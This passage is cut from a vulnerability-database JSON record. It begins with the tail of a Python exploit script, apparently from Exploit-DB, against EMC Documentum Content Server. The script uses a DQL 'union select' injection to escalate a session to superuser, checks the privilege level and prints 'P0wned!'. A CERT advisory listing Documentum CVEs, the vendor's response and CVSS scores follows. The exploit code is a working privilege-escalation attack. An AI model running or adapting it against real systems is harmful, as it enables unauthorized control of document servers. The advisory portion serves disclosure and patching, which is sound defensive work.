\\\"%s,'' \" \\\r\n                \"union\b select r_object_id from dm_sysobject(all) where r_object_id=''%s\\\" \" \\\r\n                \"0000000000000000 0000000000000000 0000000000000000 \" \\\r\n                \"\\\"\\\" 0 0 T F T T %s %s'\" % \\\r\n                (docbase, docbase, install_owner, document_id,\r\n                 document_id, install_owner, session.session)\r\n\r\n    session.query(query)\r\n\r\n    r = session.query(\r\n        \"select user_privileges from dm_user \"\r\n        \"where user_name=USER\") \\\r\n        .next_record()['user_privileges']\r\n    if r != 16:\r\n        print \"Failed\"\r\n        exit(1)\r\n    print \"P0wned!\"\r\n\r\n\r\ndef create_session(host, port, user, pwd, identity=None):\r\n    print \"Trying to connect to %s:%s as %s ...\" % \\\r\n        (host, port, user)\r\n    session = None\r\n    try:\r\n        session = DocbaseClient(\r\n            host=host, port=int(port),\r\n            username=user, password=pwd,\r\n            identity=identity)\r\n    except socket.error, e:\r\n        if e.errno == 54:\r\n            session = DocbaseClient(\r\n                host=host, port=int(port),\r\n                username=user, password=pwd,\r\n                identity=identity,\r\n                secure=True, ciphers=CIPHERS)\r\n        else:\r\n            raise e\r\n    docbase = session.docbaseconfig['object_name']\r\n    version = session.serverconfig['r_server_version']\r\n    print \"Connected to %s:%s, docbase: %s, version: %s\" % \\\r\n        (host, port, docbase, version)\r\n    return (session, docbase)\r\n\r\n\r\ndef is_super_user(session):\r\n    user = session.get_by_qualification(\r\n        \"dm_user WHERE user_name=USER\")\r\n    if user['user_privileges'] == 16:\r\n        return True\r\n    group = session.get_by_qualification(\r\n        \"dm_group where group_name='dm_superusers' \"\r\n        \"AND any i_all_users_names=USER\")\r\n    if group is not None:\r\n        return True\r\n\r\n    return False\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()", "sourceHref": "https://www.exploit-db.com/download/41928", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2021-09-28T17:53:04", "description": "### Overview\n\nEMC Documentum products including Content Server, D2, and Web Development Kit (WDK) contain multiple vulnerabilities.\n\n### Description\n\nEMC Documentum Content Server, D2, and WDK contain numerous vulnerabilities of varying impact. For details, view our [spreadsheet](<https://docs.google.com/spreadsheets/d/1DiiUPCPvmaliWcfwPSc36y2mDvuidkDKQBWqaIuJi0A/edit?usp=sharing>). For status from the vendor, please visit <https://support.emc.com/docu38558> (requires EMC Online Support credentials). Search by CVE ID and/or ESA ID referenced in the spreadsheet.\n\nThe CVSS score below reflects use of backdoor credentials (see VU#184360, VU#695112, and VU#982432 in the [spreadsheet](<https://docs.google.com/spreadsheets/d/1DiiUPCPvmaliWcfwPSc36y2mDvuidkDKQBWqaIuJi0A/edit?usp=sharing>)). \n \n--- \n \n### Impact\n\nThe severity of impact varies. 
Specific examples include information disclosure, privilege escalation, authentication bypass, arbitrary code execution, shell command injection, and unauthorized access via backdoor credentials. Worst-case scenarios allow an attacker to take complete control of a vulnerable system. \n \n--- \n \n### Solution\n\n**Apply an update** \n \nEMC has released updates to address many of the issues in question. For information about specific updates, including discussion about their effectiveness, refer to the [spreadsheet](<https://docs.google.com/spreadsheets/d/1DiiUPCPvmaliWcfwPSc36y2mDvuidkDKQBWqaIuJi0A/edit?usp=sharing>). \n \n--- \n \n### Vendor Information\n\n315340\n\n### EMC Corporation (Affected)\n\nNotified: April 25, 2014 Updated: December 16, 2014 \n\n**Statement Date: December 16, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nEMC has been working with CERT on the issues announced in their recent advisory. We have released updates to address many of the issues in question and are investigating others. We will continue to create our remediation plans for open vulnerabilities and provide remedies via security advisories. We encourage our customers to refer to <http://support.emc.com> for the latest EMC Security Advisories: <https://support.emc.com/docu38558> and follow the steps identified in them to protect themselves. 
Please contact EMC Support for all other questions.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://support.emc.com/docu38558>\n * <http://support.emc.com>\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9 | E:POC/RL:ND/RC:C \nEnvironmental | 6.7 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <https://docs.google.com/spreadsheets/d/1DiiUPCPvmaliWcfwPSc36y2mDvuidkDKQBWqaIuJi0A/edit?usp=sharing>\n * <http://www.emc.com/domains/documentum/index.htm>\n * <https://support.emc.com/docu38558>\n\n### Acknowledgements\n\nThanks to Andrey B. Panfilov for reporting these vulnerabilities.\n\nThis document was written by Joel Land.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-2520](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-2520>), [CVE-2014-2518](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-2518>), [CVE-2014-4622](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-4622>), [CVE-2014-2514](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-2514>), [CVE-2014-2507](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-2507>), [CVE-2014-2513](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-2513>), [CVE-2014-4618](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-4618>), [CVE-2014-4626](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-4626>), [CVE-2014-2515](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-2515>), [CVE-2014-2504](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-2504>), [CVE-2014-4629](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-4629>) \n---|--- \n**Date Public:** | 2014-12-15 \n**Date First Published:** | 2014-12-15 \n**Date Last Updated:** | 2017-01-06 15:45 UTC \n**Document Revision:** | 50 \n", "cvss3": {}, "published": "2014-12-15T00:00:00", "type": "cert", "title": "EMC Documentum products contain multiple vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2504", "CVE-2014-2507", "CVE-2014-2513", "CVE-2014-2514", "CVE-2014-2515", "CVE-2014-2518", "CVE-2014-2520", "CVE-2014-4618", "CVE-2014-4622", "CVE-2014-4626", "CVE-2014-4629"], "modified": "2017-01-06T15:45:00", "id": "VU:315340", "href": "https://www.kb.cert.org/vuls/id/315340", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}